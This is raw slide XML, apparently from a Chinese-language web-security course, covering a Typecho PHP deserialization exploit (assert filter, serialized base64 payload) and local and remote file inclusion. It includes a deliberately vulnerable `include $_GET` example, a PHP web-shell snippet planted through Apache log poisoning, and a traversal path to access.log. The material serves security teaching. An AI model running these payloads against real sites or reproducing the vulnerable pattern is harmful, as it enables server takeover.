                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>$this-&gt;_</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>params</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>['</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>screenName</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>'] = '</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>phpinfo</a:t>
                      </a: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effectLst/>
                        </a:rPr>
                        <a:t>        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>$this-&gt;_filter[0] = 'assert';</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFF00"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    }</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>$</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>exp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> = array(</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFF00"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    'adapter' =&gt; new </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Typecho_Feed</a:t>
                      </a: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solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>);</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFF00"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>echo base64_encode(serialize($</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>exp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>));</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>?&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>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759" y="663997"/>
            <a:ext cx="11123116" cy="130862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exp.php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便可以获得</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payload</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请求的方式传递给</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成功执行。</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823" y="2392189"/>
            <a:ext cx="9433048" cy="399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8815" y="1528093"/>
            <a:ext cx="11123116" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="15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fopen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(\'newfile.txt\', \'w\');';</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$this-&gt;_filter[0] = 'assert';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试试结果如何？</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72791" y="3328293"/>
            <a:ext cx="10801200" cy="964880"/>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anose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>下面便是一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1890"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在相同的框架中引入不同功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1890" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>的示例代码，该代码可以从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="189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189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请求中获取到用户需要访问的功能，并且将对应的功能文件包含进来。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="189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1532831" y="736005"/>
            <a:ext cx="3888432" cy="2592288"/>
            <a:chOff x="8859258" y="3090372"/>
            <a:chExt cx="2733577" cy="2398161"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="íṡľíḍè-Rectangle 17"/>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8925690" y="3207014"/>
              <a:ext cx="2600712" cy="1724415"/>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重复使用的版块</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="20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。如页面的页头、页脚以及菜单文件。通过文件包含对这些文件进行引入，在某个地方需要修改时，开发人员只需要对单个文件进行更新即可，而不需要修改使用这些板块的其他文件。</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="20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p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5781303" y="719357"/>
            <a:ext cx="5760640" cy="2608936"/>
            <a:chOff x="8859258" y="3090372"/>
            <a:chExt cx="2733577" cy="2398161"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="00B050"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="íṡľíḍè-Rectangle 17"/>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8925690" y="3207014"/>
              <a:ext cx="2600712" cy="1558887"/>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具有相同框架的不同功能</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="20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开发人员可以在不同的页面引入页头、页脚，也可以在定义好页头、页脚的框架中引入不同的功能。这样有新的业务需求时，开发人员只需要开发对应的功能文件，再通过文件包含引入；在有业务需要更替时，开发人员也只需要删除对应的功能文件即可。</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="20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表格 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1964879" y="4269719"/>
          <a:ext cx="9361040" cy="2798886"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="9361040"/>
              </a:tblGrid>
              <a:tr h="2798886">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2800" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Index.php</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;?</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>php</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>$file = $_GET[‘</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>func</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>’];</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>include “$file”;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>?&gt;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2237745"/>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如果被包含文件的文件名是从用户处获得的，且没有经过恰当的检测，从而包含了预想之外的文件，导致了文件泄露甚至是恶意代码注入，这就是文件包含漏洞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。如果被包含的文件储存在服务器上，那么对于应用来说，</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被包含的文件就在本地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，就称之为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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本地文件包含漏洞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64499"/>
            <a:ext cx="4032448" cy="878191"/>
            <a:chOff x="596727" y="864499"/>
            <a:chExt cx="2596493" cy="878191"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="组合 1"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="596727" y="864499"/>
              <a:ext cx="2596493" cy="878191"/>
              <a:chOff x="1420106" y="1392013"/>
              <a:chExt cx="2596493" cy="878191"/>
            </a:xfrm>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="20000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30" name="Round Same Side Corner Rectangle 29"/>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48299" y="1392013"/>
                <a:ext cx="1968300" cy="878191"/>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本地文件包含漏洞</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security-shield_74740"/>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p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1085349" y="3832349"/>
            <a:ext cx="10672618" cy="2808312"/>
            <a:chOff x="2324919" y="2752228"/>
            <a:chExt cx="3366406" cy="3429636"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="组合 6"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2324919" y="2752228"/>
              <a:ext cx="3366406" cy="3429636"/>
              <a:chOff x="2324919" y="2752228"/>
              <a:chExt cx="3366406" cy="3429636"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="矩形 26"/>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p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2400010" y="2984478"/>
                <a:ext cx="3291315" cy="319738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p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2540943" y="2986251"/>
              <a:ext cx="3059530" cy="2819028"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">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场景一：包含上传的合法文件</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通常应用中都会有文件上传的功能，比如用户头像上传、附件上传等。通过文件上传，攻击者将能携带有恶意代码的合法文件上传到服务器中，由于</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include</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等语句中，无论被包含文件的后缀名是什么，只要其中有</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的代码，都会将其执行。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结合文件包含漏洞，可以将上传的恶意文件引入，使其中的恶意代码得到执行。</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172791" y="1217589"/>
            <a:ext cx="10297144" cy="124660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en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>服务器往往会将用户的请求记录在一个日志文件中，以供系统管理员审查。在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>系统下，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>默认的日志文件为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/log/apache2/access.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>。日志文件会记录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>地址、访问的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>、访问时间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>等信息。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="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
        <p:nvSpPr>
          <p:cNvPr id="18" name="íṡľíḍè-Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1172791" y="633452"/>
            <a:ext cx="3744416"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Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>场景二：包含日志文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="组合 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="992771" y="2775841"/>
            <a:ext cx="10873208" cy="2164097"/>
            <a:chOff x="2468935" y="3335160"/>
            <a:chExt cx="7848872" cy="3607969"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="矩形 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2861378" y="3533003"/>
              <a:ext cx="7144552" cy="3360955"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>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利用这个功能，攻击者可以：</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先构造一条包含恶意代码的请求，如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t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="1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kern="1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b="1"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b="1" kern="1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($_POST[‘pass’]); ?&gt;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，这一条请求</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会被</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服务器写入日志文件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再利用本地文件包含漏洞，如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t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"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?func</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=..../../log/apache2/access.log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日志文件引入，使得植入的恶意代码得到执行</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圆角 39"/>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5402" y="5333208"/>
            <a:ext cx="11016943" cy="117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3" presetClass="entr" presetSubtype="1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blinds(horizontal)">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488759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顾名思义，</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如果存在文件包含漏洞，且</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允许被包含的文件可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"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获取</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，则称为</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远程文件包含漏洞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中，有两项关于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打开远程文件的设置，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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980" lvl="1" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pP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是否允许</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打开文件</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，默认为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980" lvl="1" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pP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是否允许通过</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打开的文件用于</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等函数</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，默认为</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Off</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开启的前提条件，只有</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同时设置为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时，才可能存在远程文件包含漏洞。</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出于安全考虑，这两个变量的值只能在配置文件</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php.ini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中更改。</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64499"/>
            <a:ext cx="4032448" cy="519578"/>
            <a:chOff x="596727" y="864499"/>
            <a:chExt cx="2596493" cy="519578"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="组合 1"/>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48299" y="1392013"/>
                <a:ext cx="19683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远程文件包含漏洞</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security-shield_74740"/>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28775" y="3130059"/>
            <a:ext cx="10945216" cy="3046095"/>
            <a:chOff x="2360923" y="4242600"/>
            <a:chExt cx="10945216" cy="3046095"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
